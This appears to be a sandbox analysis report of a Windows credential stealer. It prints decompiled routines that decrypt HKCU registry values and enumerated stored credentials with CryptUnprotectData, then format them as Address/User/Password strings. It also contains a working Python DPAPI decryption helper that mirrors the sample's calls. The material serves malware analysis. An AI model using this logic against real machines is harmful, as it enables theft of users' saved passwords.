                                    				int _v32;
                                    				int _v36;
                                    				char* _v40;
                                    				char* _v44;
                                    				char _v48;
                                    				intOrPtr _v52;
                                    				char _v56;
                                    				intOrPtr _v60;
                                    				char _v64;
                                    				char _v68;
                                    				char _v72;
                                    				char _v76;
                                    				char _v80;
                                    				char _v84;
                                    				char _v88;
                                    				char _v92;
                                    				char _v96;
                                    				char _v100;
                                    				char _v104;
                                    				char _v108;
                                    				char _v112;
                                    				long _t168;
                                    				long _t238;
                                    				long _t251;
                                    				char* _t259;
                                    				signed int _t260;
                                    				intOrPtr _t262;
                                    				intOrPtr _t323;
                                    				intOrPtr _t326;
                                    				intOrPtr _t327;
                                    				long _t339;
                                    				long _t340;
                                    				intOrPtr _t343;
                                    				intOrPtr _t344;
                                    				void* _t350;
                                    
                                    				_t350 = __fp0;
                                    				_t341 = __esi;
                                    				_t343 = _t344;
                                    				_t262 = 0xd;
                                    				do {
                                    					_push(0);
                                    					_push(0);
                                    					_t262 = _t262 - 1;
                                    				} while (_t262 != 0);
                                    				_t1 =  &_v8;
                                    				 *_t1 = _t262;
                                    				_push(__esi);
                                    				_v12 =  *_t1;
                                    				_t259 = __edx;
                                    				_v8 = __eax;
                                    				E0040302C(_v8);
                                    				_push(_t343);
                                    				_push(0x4092a7);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t344;
                                    				E00401AC0( &_v80);
                                    				_v16 = 0;
                                    				// 0x80000001 = HKEY_CURRENT_USER; the subkey name arrives in __edx; 1 = KEY_QUERY_VALUE
                                    				if(RegOpenKeyExA(0x80000001, _t259, 0, 1,  &_v24) == 0) {
                                    					_v28 = 0x400;
                                    					_t341 = E00401174(_v28);
                                    					// walk every value name under the key until ERROR_NO_MORE_ITEMS (0x103)
                                    					while(RegEnumValueA(_v24, _v16, _t341,  &_v28, 0, 0, 0, 0) != 0x103) {
                                    						_v28 = 0x400;
                                    						_t339 = E00402E08();
                                    						__eflags = _t339;
                                    						if(_t339 >= 0) {
                                    							_t340 = _t339 + 1;
                                    							_t260 = 0;
                                    							__eflags = 0;
                                    							do {
                                    								E00408AF8( *((intOrPtr*)(_v8 + _t260 * 4)), _t260,  &_v20, _t340, _t341);
                                    								// first call with a NULL buffer returns the value size in _v36, then the data is read into the freshly allocated _v40
                                    								RegQueryValueExA(_v24, _t341, 0,  &_v32, 0,  &_v36);
                                    								_push(_v36);
                                    								E00402FBC();
                                    								_t344 = _t344 + 4;
                                    								_t238 = RegQueryValueExA(_v24, _t341, 0,  &_v32, _v40,  &_v36);
                                    								__eflags = _t238;
                                    								if(_t238 == 0) {
                                    									_v44 = _v40;
                                    									_v48 = _v36;
                                    									_v60 =  *((intOrPtr*)(_v8 + _t260 * 4));
                                    									E00402218( &_v84,  *((intOrPtr*)(_v8 + _t260 * 4)));
                                    									// entropy cbData = 2 * (strlen(name) + 1): the value name as a NUL-terminated wide string; _v60 (set above) is pbData
                                    									_v64 = E00402274(_v84) + 1 + E00402274(_v84) + 1;
                                    									// stdcall pushes right to left: the first push is the last parameter
                                    									_push( &_v56);   // pDataOut
                                    									_push(1);        // dwFlags = CRYPTPROTECT_UI_FORBIDDEN
                                    									_push(0);        // pPromptStruct
                                    									_push(0);        // pvReserved
                                    									_push( &_v64);   // pOptionalEntropy: DATA_BLOB {cbData = _v64, pbData = _v60}
                                    									_push(0);        // ppszDataDescr
                                    									_t251 =  &_v48;  // pDataIn: DATA_BLOB {cbData = _v48, pbData = _v44} = the registry value just read
                                    									_push(_t251);
                                    									L004086F0();     // CryptUnprotectData (ref 00408F89 in the API list below)
                                    									__eflags = _t251;
                                    									if(_t251 != 0) {
                                    										_push(_v80);
                                    										_push("Address: ");
                                    										E00401CDC( &_v88,  *((intOrPtr*)(_v8 + _t260 * 4)));
                                    										_push(_v88);
                                    										_push(0x4092d4);
                                    										E00401E10();
                                    										_push(_v80);
                                    										E00408CCC(_v52, _t260,  &_v92, _t340, _t341, _t350);
                                    										_push(_v92);
                                    										_push(0x4092e0);
                                    										E00401E10();
                                    									}
                                    								}
                                    								_t260 = _t260 + 1;
                                    								_t340 = _t340 - 1;
                                    								__eflags = _t340;
                                    							} while (_t340 != 0);
                                    						}
                                    						E00403738();
                                    						_t57 =  &_v16;
                                    						 *_t57 = _v16 + 1;
                                    						__eflags =  *_t57;
                                    					}
                                    				}
                                    				RegCloseKey(_v24);
                                    				L17:
                                    				while(E0040202C(0x4092e0, _v80) > 0) {
                                    					E00401FA4(_v80, E0040202C(0x4092e0, _v80) - 1, 1,  &_v72);
                                    					E00401FE4( &_v80, E0040202C(0x4092e0, _v80) + 1, 1);
                                    					E00401D9C( &_v100, 0x4092e0, _v72);
                                    					E0040592C(_v100, _t259, _v80, 0, _t341, __eflags,  &_v96);
                                    					E00401B58( &_v80, _v96);
                                    					__eflags = E0040202C(0x4092ec, _v72) - 1;
                                    					E00401FA4(_v72, E0040202C(0x4092ec, _v72) - 1, 1,  &_v104);
                                    					E00401E94(_v104, "Address");
                                    					if(__eflags == 0) {
                                    						E00401FE4( &_v72, E0040202C(0x409308, _v72), 1);
                                    						E00401FA4(_v72, E0040202C(0x4092d4, _v72) - 1, 1,  &_v68);
                                    						E00401FE4( &_v72, E0040202C(0x4092d4, _v72), 1);
                                    						while(1) {
                                    							_t168 = E0040202C(0x4092d4, _v72);
                                    							__eflags = _t168;
                                    							if(_t168 <= 0) {
                                    								goto L17;
                                    							}
                                    							E00401FE4( &_v72, E0040202C(0x409308, _v72), 1);
                                    							_push(_v76);
                                    							_push(_v68);
                                    							_push(0x4092d4);
                                    							E00401FA4(_v72, E0040202C(0x4092d4, _v72) - 1, 1,  &_v108);
                                    							_push(_v108);
                                    							_push(0x4092d4);
                                    							E00401E10();
                                    							E00401FE4( &_v72, E0040202C(0x4092d4, _v72), 1);
                                    							E00401FE4( &_v72, E0040202C(0x409308, _v72), 1);
                                    							_push(_v76);
                                    							__eflags = E0040202C(0x4092d4, _v72) - 1;
                                    							E00401FA4(_v72, E0040202C(0x4092d4, _v72) - 1, 1,  &_v112);
                                    							_push(_v112);
                                    							_push(0x4092d4);
                                    							E00401E10();
                                    							E00401FE4( &_v72, E0040202C(0x4092d4, _v72), 1);
                                    							E00401D58( &_v76, 0x4092e0);
                                    						}
                                    					}
                                    				}
                                    				E00401B14(_v12, _v76);
                                    				_pop(_t323);
                                    				 *[fs:eax] = _t323;
                                    				_push(E004092AE);
                                    				E00401AE4( &_v112, 7);
                                    				E00402108( &_v84);
                                    				E00401AE4( &_v80, 4);
                                    				_t326 =  *0x408e34; // 0x408e38
                                    				E00402FC8( &_v40, _t326);
                                    				E00401AC0( &_v20);
                                    				_t327 =  *0x408730; // 0x408734
                                    				return E00402FC8( &_v8, _t327);
                                    			}
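DPAPI triage for the two credential-theft routines, as an added example that is not code from the report or from the sample: E00408E58 above decrypts HKCU registry values with the value name as CryptUnprotectData entropy, and E0040930B (next) decrypts enumerated credential blobs with the fixed string "abe2869f-9b47-4cd9-a358-c22904dba7f7" as entropy. The helper rebuilds the pOptionalEntropy blob the way the sample does, recognises DPAPI blobs by their 20-byte header, extracts the master key GUID an analyst needs to find the key file, and, on Windows only, calls CryptUnprotectData with the sample's argument pattern. The DPAPI header bytes and the master-key offset are the public blob format; the registry dump, the value names and the master key GUID below are constructed.

```python
"""DPAPI triage helper for the two credential-theft functions above
(E00408E58: registry values decrypted with the value name as entropy;
E0040930B: enumerated credentials decrypted with the fixed string
"abe2869f-9b47-4cd9-a358-c22904dba7f7" as entropy). Added example, not code
from the report or the sample. It rebuilds the pOptionalEntropy blob the way
the sample does, recognises DPAPI blobs by their header, pulls out the master
key GUID an analyst needs to locate the key file, and, on Windows only, calls
CryptUnprotectData with the sample's argument pattern. Inputs are constructed."""
import struct
import sys
import uuid
from typing import Dict, List, Optional, Tuple

# Every DPAPI blob starts with dwVersion = 1 and the DPAPI provider GUID
# {df9d8cd0-1501-11d1-8c7a-00c04fc297eb} in little-endian layout (20 bytes).
DPAPI_HEADER = bytes.fromhex("01000000" "d08c9ddf0115d1118c7a00c04fc297eb")
MASTERKEY_GUID_OFFSET = 24          # follows dwMasterKeyVersion at offset 20
CRYPTPROTECT_UI_FORBIDDEN = 0x1     # dwFlags used by E00408E58
SAMPLE_FIXED_ENTROPY = "abe2869f-9b47-4cd9-a358-c22904dba7f7"


def wide_entropy(text: str) -> bytes:
    """pbData of the entropy DATA_BLOB as the sample builds it: each byte of the
    ANSI string widened to 16 bits, terminating NUL included, so
    cbData == 2 * (len(text) + 1). For the fixed GUID that is 0x4a == 74 bytes."""
    raw = text.encode("latin-1") + b"\x00"          # assumes single-byte names
    return b"".join(bytes((b, 0)) for b in raw)


def is_dpapi_blob(data: bytes) -> bool:
    return data[:len(DPAPI_HEADER)] == DPAPI_HEADER


def master_key_guid(blob: bytes) -> Optional[str]:
    """GUID of the master key protecting the blob; it names the key file under
    %APPDATA%\\Microsoft\\Protect\\<SID>\\ (or the SYSTEM store for machine scope)."""
    if not is_dpapi_blob(blob) or len(blob) < MASTERKEY_GUID_OFFSET + 16:
        return None
    return str(uuid.UUID(bytes_le=blob[MASTERKEY_GUID_OFFSET:MASTERKEY_GUID_OFFSET + 16]))


def triage_registry_values(values: Dict[str, bytes]) -> List[Tuple[str, str, int]]:
    """Selection step of E00408E58 without the decryption: for every value under
    the key, report DPAPI blobs as (value name, master key GUID, entropy cbData)."""
    hits = []
    for name, data in values.items():
        if is_dpapi_blob(data):
            hits.append((name, master_key_guid(data) or "?", len(wide_entropy(name))))
    return hits


def unprotect(blob: bytes, entropy: Optional[bytes] = None, flags: int = 0) -> bytes:
    """Windows only: CryptUnprotectData(&in, NULL, &entropy, NULL, NULL, flags, &out),
    the call pattern of both functions above. Raises OSError on failure."""
    if sys.platform != "win32":
        raise OSError("CryptUnprotectData is only available on Windows")
    import ctypes
    from ctypes import wintypes

    class DATA_BLOB(ctypes.Structure):
        _fields_ = [("cbData", wintypes.DWORD), ("pbData", ctypes.c_void_p)]

    keep = []                                   # keep buffers alive during the call

    def blob_of(b: bytes) -> DATA_BLOB:
        buf = ctypes.create_string_buffer(b, len(b))
        keep.append(buf)
        return DATA_BLOB(len(b), ctypes.addressof(buf))

    data_in, data_out = blob_of(blob), DATA_BLOB()
    ent = blob_of(entropy) if entropy else None
    ok = ctypes.windll.crypt32.CryptUnprotectData(
        ctypes.byref(data_in), None, ctypes.byref(ent) if ent else None,
        None, None, flags, ctypes.byref(data_out))
    if not ok:
        raise ctypes.WinError()
    try:
        return ctypes.string_at(data_out.pbData, data_out.cbData)
    finally:
        ctypes.windll.kernel32.LocalFree(data_out.pbData)


# Constructed registry dump (not from the report): one DPAPI blob, one plain string.
CONSTRUCTED_MASTERKEY = uuid.UUID("11111111-2222-3333-4444-555555555555")
CONSTRUCTED_BLOB = (DPAPI_HEADER + struct.pack("<I", 1) + CONSTRUCTED_MASTERKEY.bytes_le
                    + struct.pack("<II", 0, 0) + bytes(64))   # flags, descr len, opaque rest
CONSTRUCTED_VALUES = {
    "Account Password": CONSTRUCTED_BLOB,
    "Display Name": b"Jane Example\x00",
}

if __name__ == "__main__":
    print(f"fixed entropy cbData = 0x{len(wide_entropy(SAMPLE_FIXED_ENTROPY)):x}")
    for name, mk, cb in triage_registry_values(CONSTRUCTED_VALUES):
        print(f"{name!r}: DPAPI blob, master key {mk}, entropy cbData {cb}")
```

On a Windows host, `unprotect(value_bytes, wide_entropy(value_name), CRYPTPROTECT_UI_FORBIDDEN)` reproduces the E00408E58 call and `unprotect(blob, wide_entropy(SAMPLE_FIXED_ENTROPY))` the E0040930B call (which passes dwFlags = 0); the master key GUID tells you which key file in the user's Protect directory an offline analyst would need.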

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00000001,?,00000000,004092A7,?,?,?,?,00000000,00000000), ref: 00408EA7
                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,?,00000000,00000400,00000000,00000000,00000000,00000000,80000001), ref: 00408F05
                                    • RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,?,?,?), ref: 00408F37
                                    • CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 00408F89
                                    • RegEnumValueA.ADVAPI32(?,?,00000000,00000400,00000000,00000000,00000000,00000000,80000001,?,00000000,00000001,?,00000000,004092A7), ref: 0040900D
                                    • RegCloseKey.ADVAPI32(?,80000001,?,00000000,00000001,?,00000000,004092A7,?,?,?,?,00000000,00000000), ref: 00409021
                                      • Part of subcall function 00408AF8: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B36
                                      • Part of subcall function 00408AF8: CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B4C
                                      • Part of subcall function 00408AF8: CryptHashData.ADVAPI32(?,?,00000001,00000000,?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B76
                                      • Part of subcall function 00408AF8: CryptGetHashParam.ADVAPI32(?,00000002,?,00000014,00000000), ref: 00408BB2
                                      • Part of subcall function 00408AF8: CryptDestroyHash.ADVAPI32(?,?,00000002,?,00000014,00000000), ref: 00408BC3
                                      • Part of subcall function 00408AF8: CryptReleaseContext.ADVAPI32(?,00000000,?,?,00000002,?,00000014,00000000), ref: 00408BCE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Crypt$Hash$Value$ContextDataQuery$AcquireCloseCreateDestroyEnumOpenParamReleaseUnprotect
                                    • String ID: Address$Address: $J
                                    • API String ID: 1010751750-89420950
                                    • Opcode ID: 7efb64ff1d09feb6c5cb58f5f9c5601f3d714a3b7ee7f36232088a820c5129bc
                                    • Instruction ID: a1307f370dcfab90242bbc2907a83997e987d907be1ae94acc32d6e323161374
                                    • Opcode Fuzzy Hash: 7efb64ff1d09feb6c5cb58f5f9c5601f3d714a3b7ee7f36232088a820c5129bc
                                    • Instruction Fuzzy Hash: CBC1D135A00109ABDB01EBD5C981ADEB7B9EF48304F20447BF500F73D6DA79AE468B59
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 51%
                                    			E0040930B(void* __eax, intOrPtr __ebx, void* __edx, void* __edi, void* __esi) {
                                    				char _v8;
                                    				char _v12;
                                    				intOrPtr _v16;
                                    				char _v20;
                                    				intOrPtr _v24;
                                    				char _v28;
                                    				char* _v32;
                                    				char _v36;
                                    				char _v40;
                                    				char _v114;
                                    				intOrPtr _v117;
                                    				void _v151;
                                    				char _v156;
                                    				intOrPtr _v160;
                                    				char _v164;
                                    				char _v168;
                                    				char _v172;
                                    				char _v176;
                                    				char _v180;
                                    				intOrPtr _v184;
                                    				char _v188;
                                    				char _v192;
                                    				char _v196;
                                    				char _v200;
                                    				char _v204;
                                    				char _v208;
                                    				char _v212;
                                    				char _v216;
                                    				char _v220;
                                    				char _v224;
                                    				void* _t81;
                                    				void* _t86;
                                    				intOrPtr _t121;
                                    				void* _t160;
                                    				void* _t175;
                                    				void* _t187;
                                    				void* _t189;
                                    				short* _t191;
                                    				intOrPtr _t198;
                                    				intOrPtr _t203;
                                    				void* _t226;
                                    				void* _t233;
                                    				signed int _t234;
                                    				void* _t236;
                                    				intOrPtr* _t238;
                                    				intOrPtr _t240;
                                    				intOrPtr _t241;
                                    
                                    				_t174 = __ebx;
                                    				_v117 = _v117 + __edx;
                                    				_t240 = _t241;
                                    				_t175 = 0x1b;
                                    				do {
                                    					_push(0);
                                    					_push(0);
                                    					_t175 = _t175 - 1;
                                    				} while (_t175 != 0);
                                    				_push(_t175);
                                    				_push(__ebx);
                                    				_t236 = __eax;
                                    				_push(_t240);
                                    				_push(0x409651);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t241;
                                    				E00401AC0(__eax);
                                    				// 36-byte GUID string copied as 9 dwords ...
                                    				memcpy( &_v151, "abe2869f-9b47-4cd9-a358-c22904dba7f7", 9 << 2);
                                    				asm("movsb");   // ... plus its terminating NUL: 37 bytes
                                    				_t238 = _t236;
                                    				_t233 = 0x25;   // 37 iterations
                                    				_t81 =  &_v151;
                                    				_t191 =  &_v114;
                                    				// widen each byte to a 16-bit unit, i.e. the GUID as a NUL-terminated wide string
                                    				// (the decompiler lost the byte load that feeds the store)
                                    				do {
                                    					 *_t191 = 0 << 2;
                                    					_t191 = _t191 + 2;
                                    					_t81 = _t81 + 1;
                                    					_t233 = _t233 - 1;
                                    				} while (_t233 != 0);
                                    				_v32 =  &_v114;   // DATA_BLOB.pbData
                                    				_v36 = 0x4a;      // DATA_BLOB.cbData = 74 = 2 * (36 + 1): fixed entropy for CryptUnprotectData below
                                    				_push( &_v8);     // &Credentials
                                    				_push( &_v12);    // &Count
                                    				_push(0);         // Flags
                                    				_push(0);         // Filter
                                    				// argument pattern of CredEnumerateA(NULL, 0, &Count, &Credentials); the import itself is not in this excerpt's API list
                                    				L004086E8();
                                    				_t86 = _v12 - 1;
                                    				if(_t86 >= 0) {
                                    					_v40 = _t86 + 1;
                                    					_t234 = 0;
                                    					do {
                                    						_t121 =  *((intOrPtr*)(_v8 + _t234 * 4));   // Credentials[i]
                                    						// offsets match CREDENTIALA (32-bit): CredentialBlob at +0x1c, CredentialBlobSize at +0x18
                                    						_v16 =  *((intOrPtr*)(_t121 + 0x1c));
                                    						_v20 =  *((intOrPtr*)(_t121 + 0x18));        // &_v20 is pDataIn: DATA_BLOB {cbData = _v20, pbData = _v16}
                                    						_push( &_v28);   // pDataOut
                                    						_push(0);        // dwFlags
                                    						_push(0);        // pPromptStruct
                                    						_push(0);        // pvReserved
                                    						_push( &_v36);   // pOptionalEntropy: the 0x4a-byte wide GUID built above
                                    						_push(0);        // ppszDataDescr
                                    						_push( &_v20);   // pDataIn
                                    						L004086F0();     // CryptUnprotectData
                                    						_push( *_t238);
                                    						_push("Address: ");
                                    						E00401CAC( &_v156,  *((intOrPtr*)( *((intOrPtr*)(_v8 + _t234 * 4)) + 8)));   // +8 = CREDENTIALA.TargetName, reported as "Address: "
                                    						_push(_v156);
                                    						_push(0x4096a4);
                                    						E00401E10();
                                    						E00401174(_v28);
                                    						_t174 = _v24;
                                    						E00401D9C( &_v168, "User: ",  *_t238);
                                    						E00402254( &_v164, _v168);
                                    						_push(_v164);
                                    						_push( &_v172);
                                    						E00402218( &_v176, _v24);
                                    						_push(E00402398(0x4096bc, _v176) - 1);
                                    						E00402218( &_v180, _v24);
                                    						_pop(_t187);
                                    						E0040234C(_v180, _t187, 0, 0);
                                    						_push(_v172);
                                    						_push(0x4096c4);
                                    						E00402280();
                                    						E00401D3C(_t238, _v160);
                                    						E00401D9C( &_v192, "Password: ",  *_t238);
                                    						E00402254( &_v188, _v192);
                                    						_push(_v188);
                                    						_push( &_v196);
                                    						E00402218( &_v200, _v24);
                                    						_push(E00402398(0x4096bc, _v200));
                                    						E00402218( &_v204, _v24);
                                    						_t160 = E00402274(_v204);
                                    						_push(_t160 - _t222);
                                    						E00402218( &_v208, _t174);
                                    						_push(E00402398(0x4096bc, _v208) + 1);
                                    						E00402218( &_v212, _t174);
                                    						_pop(_t226);
                                    						_pop(_t189);
                                    						E0040234C(_v212, _t189, _t226, 0);
                                    						_push(_v196);
                                    						_push(0x4096c4);
                                    						_push(0x4096e4);
                                    						E00402280();
                                    						E00401D3C(_t238, _v184);
                                    						_t234 = _t234 + 1;
                                    						_t60 =  &_v40;
                                    						 *_t60 = _v40 - 1;
                                    						_t249 =  *_t60;
                                    					} while ( *_t60 != 0);
                                    				}
                                    				E0040592C("Address: ", _t174,  *_t238, 0, _t238, _t249,  &_v216);
                                    				E00401B14(_t238, _v216);
                                    				E0040592C("User: ", _t174,  *_t238, 0, _t238, _t249,  &_v220);
                                    				E00401B14(_t238, _v220);
                                    				E0040592C("Password: ", _t174,  *_t238, 0, _t238, _t249,  &_v224);
                                    				E00401B14(_t238, _v224);
                                    				_pop(_t198);
                                    				 *[fs:eax] = _t198;
                                    				_push(E00409658);
                                    				E00401AE4( &_v224, 3);
                                    				E00402120( &_v212, 5);
                                    				E00401AC0( &_v192);
                                    				E00402120( &_v188, 5);
                                    				E00401AC0( &_v168);
                                    				E00402120( &_v164, 2);
                                    				E00401AC0( &_v156);
                                    				_t203 =  *0x4086bc; // 0x4086c0
                                    				return E00402FC8( &_v8, _t203);
                                    			}

(Instruction address column of the original report, one address per decompiled line above: 0x0040930b to 0x00409650)


                                    APIs
                                    • CredEnumerateA.ADVAPI32(00000000,00000000,?,?,00000000,00409651,?,?,?,?,0000001A,00000000,00000000), ref: 00409383
                                    • CryptUnprotectData.CRYPT32(?,00000000,0000004A,00000000,00000000,00000000,?), ref: 004093C0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
• Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
• Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
• Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CredCryptDataEnumerateUnprotect
                                    • String ID: Address: $J$Password: $User: $abe2869f-9b47-4cd9-a358-c22904dba7f7
                                    • API String ID: 347848744-1664342708
                                    • Opcode ID: 4a3879545c6f68b8761238015d078142ae55796dd998d212b916fac696537039
                                    • Instruction ID: a5b569f93a913c997ede62b459655b5d3c6f20ecc9ce9054b703515ecd65e6d0
                                    • Opcode Fuzzy Hash: 4a3879545c6f68b8761238015d078142ae55796dd998d212b916fac696537039
                                    • Instruction Fuzzy Hash: 12911134A001189BDB10EB65CD41F9EB3B9EF88304F5085FBA508B72D6DB789E458F69
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 51%
                                    			E0040930C(void* __eax, intOrPtr __ebx, void* __edi, void* __esi) {
                                    				char _v8;
                                    				char _v12;
                                    				intOrPtr _v16;
                                    				char _v20;
                                    				intOrPtr _v24;
                                    				char _v28;
                                    				char* _v32;
                                    				char _v36;
                                    				char _v40;
                                    				char _v114;
                                    				void _v151;
                                    				char _v156;
                                    				intOrPtr _v160;
                                    				char _v164;
                                    				char _v168;
                                    				char _v172;
                                    				char _v176;
                                    				char _v180;
                                    				intOrPtr _v184;
                                    				char _v188;
                                    				char _v192;
                                    				char _v196;
                                    				char _v200;
                                    				char _v204;
                                    				char _v208;
                                    				char _v212;
                                    				char _v216;
                                    				char _v220;
                                    				char _v224;
                                    				void* _t79;
                                    				void* _t84;
                                    				intOrPtr _t119;
                                    				void* _t158;
                                    				void* _t173;
                                    				void* _t185;
                                    				void* _t187;
                                    				short* _t188;
                                    				intOrPtr _t195;
                                    				intOrPtr _t200;
                                    				void* _t223;
                                    				void* _t230;
                                    				signed int _t231;
                                    				void* _t233;
                                    				intOrPtr* _t235;
                                    				intOrPtr _t237;
                                    				intOrPtr _t238;
                                    
                                    				_t172 = __ebx;
                                    				_t237 = _t238;
                                    				_t173 = 0x1b;
                                    				do {
                                    					_push(0);
                                    					_push(0);
                                    					_t173 = _t173 - 1;
                                    				} while (_t173 != 0);
                                    				_push(_t173);
                                    				_push(__ebx);
                                    				_t233 = __eax;
                                    				_push(_t237);
                                    				_push(0x409651);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t238;
                                    				E00401AC0(__eax);
                                    				memcpy( &_v151, "abe2869f-9b47-4cd9-a358-c22904dba7f7", 9 << 2);
                                    				asm("movsb");
                                    				_t235 = _t233;
                                    				_t230 = 0x25;
                                    				_t79 =  &_v151;
                                    				_t188 =  &_v114;
                                    				do {
                                    					 *_t188 = 0 << 2;
                                    					_t188 = _t188 + 2;
                                    					_t79 = _t79 + 1;
                                    					_t230 = _t230 - 1;
                                    				} while (_t230 != 0);
                                    				_v32 =  &_v114;
                                    				_v36 = 0x4a;
                                    				_push( &_v8);
                                    				_push( &_v12);
                                    				_push(0);
                                    				_push(0);
                                    				L004086E8();
                                    				_t84 = _v12 - 1;
                                    				if(_t84 >= 0) {
                                    					_v40 = _t84 + 1;
                                    					_t231 = 0;
                                    					do {
                                    						_t119 =  *((intOrPtr*)(_v8 + _t231 * 4));
                                    						_v16 =  *((intOrPtr*)(_t119 + 0x1c));
                                    						_v20 =  *((intOrPtr*)(_t119 + 0x18));
                                    						_push( &_v28);
                                    						_push(0);
                                    						_push(0);
                                    						_push(0);
                                    						_push( &_v36);
                                    						_push(0);
                                    						_push( &_v20);
                                    						L004086F0();
                                    						_push( *_t235);
                                    						_push("Address: ");
                                    						E00401CAC( &_v156,  *((intOrPtr*)( *((intOrPtr*)(_v8 + _t231 * 4)) + 8)));
                                    						_push(_v156);
                                    						_push(0x4096a4);
                                    						E00401E10();
                                    						E00401174(_v28);
                                    						_t172 = _v24;
                                    						E00401D9C( &_v168, "User: ",  *_t235);
                                    						E00402254( &_v164, _v168);
                                    						_push(_v164);
                                    						_push( &_v172);
                                    						E00402218( &_v176, _v24);
                                    						_push(E00402398(0x4096bc, _v176) - 1);
                                    						E00402218( &_v180, _v24);
                                    						_pop(_t185);
                                    						E0040234C(_v180, _t185, 0, 0);
                                    						_push(_v172);
                                    						_push(0x4096c4);
                                    						E00402280();
                                    						E00401D3C(_t235, _v160);
                                    						E00401D9C( &_v192, "Password: ",  *_t235);
                                    						E00402254( &_v188, _v192);
                                    						_push(_v188);
                                    						_push( &_v196);
                                    						E00402218( &_v200, _v24);
                                    						_push(E00402398(0x4096bc, _v200));
                                    						E00402218( &_v204, _v24);
                                    						_t158 = E00402274(_v204);
                                    						_push(_t158 - _t219);
                                    						E00402218( &_v208, _t172);
                                    						_push(E00402398(0x4096bc, _v208) + 1);
                                    						E00402218( &_v212, _t172);
                                    						_pop(_t223);
                                    						_pop(_t187);
                                    						E0040234C(_v212, _t187, _t223, 0);
                                    						_push(_v196);
                                    						_push(0x4096c4);
                                    						_push(0x4096e4);
                                    						E00402280();
                                    						E00401D3C(_t235, _v184);
                                    						_t231 = _t231 + 1;
                                    						_t58 =  &_v40;
                                    						 *_t58 = _v40 - 1;
                                    						_t245 =  *_t58;
                                    					} while ( *_t58 != 0);
                                    				}
                                    				E0040592C("Address: ", _t172,  *_t235, 0, _t235, _t245,  &_v216);
                                    				E00401B14(_t235, _v216);
                                    				E0040592C("User: ", _t172,  *_t235, 0, _t235, _t245,  &_v220);
                                    				E00401B14(_t235, _v220);
                                    				E0040592C("Password: ", _t172,  *_t235, 0, _t235, _t245,  &_v224);
                                    				E00401B14(_t235, _v224);
                                    				_pop(_t195);
                                    				 *[fs:eax] = _t195;
                                    				_push(E00409658);
                                    				E00401AE4( &_v224, 3);
                                    				E00402120( &_v212, 5);
                                    				E00401AC0( &_v192);
                                    				E00402120( &_v188, 5);
                                    				E00401AC0( &_v168);
                                    				E00402120( &_v164, 2);
                                    				E00401AC0( &_v156);
                                    				_t200 =  *0x4086bc; // 0x4086c0
                                    				return E00402FC8( &_v8, _t200);
                                    			}

(Instruction address column of the original report, one address per decompiled line above: 0x0040930c to 0x00409650)


                                    APIs
                                    • CredEnumerateA.ADVAPI32(00000000,00000000,?,?,00000000,00409651,?,?,?,?,0000001A,00000000,00000000), ref: 00409383
                                    • CryptUnprotectData.CRYPT32(?,00000000,0000004A,00000000,00000000,00000000,?), ref: 004093C0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
• Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
• Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
• Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CredCryptDataEnumerateUnprotect
                                    • String ID: Address: $J$Password: $User: $abe2869f-9b47-4cd9-a358-c22904dba7f7
                                    • API String ID: 347848744-1664342708
                                    • Opcode ID: a598dedb873e850efc99fa9ce02c242345e1ad2a0e5d827fa5438b311f1ce501
                                    • Instruction ID: f7aa1b8b451512ca1bfa8244105fd5df2e5d2c4bebb96dcb77b4513865450f7e
                                    • Opcode Fuzzy Hash: a598dedb873e850efc99fa9ce02c242345e1ad2a0e5d827fa5438b311f1ce501
                                    • Instruction Fuzzy Hash: 59912234A001189BDB10EB55CD41F9EB3B9EF88304F5085FBA508B72D6DB789E458F69
                                    Uniqueness

                                    Uniqueness Score: -1.00%
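
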